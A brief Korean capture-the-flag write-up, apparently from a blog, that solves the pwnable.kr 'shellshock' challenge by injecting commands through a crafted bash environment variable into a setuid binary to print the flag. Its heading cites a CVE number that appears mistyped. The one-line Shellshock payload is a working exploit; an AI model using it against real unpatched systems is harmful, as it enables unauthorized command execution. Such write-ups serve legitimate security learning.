cve-2014-62711 pwnable.kr shellshock ssh shellshock@pwnable.kr -p2222 먼저 아래와 같은 파일을 볼 수 있다. 코드는 아래와 같다. 문제 이름에서도 알 수 있듯 이번 문제는 shellshock 취약점을 이용하여 풀 수 있다. shellshock와 관련해서는 검색해보면 자세한 설명과 관련 CVE 등을 볼 수 있다. env x='() { :;}; echo hello' bash -c "echo world"여기서 다시 shellshock.c를 보면 system("/home/shellshock/bash -c 'echo shock_me'")가 있다. 따라서 env x='() { :;}; echo hello' ./shellshock를 해준다. 여기서 echo hello 부분을 cat flag로 바꾸면 플래그를 얻을 수 있다. 2019. 2. 1. 이전 1 다음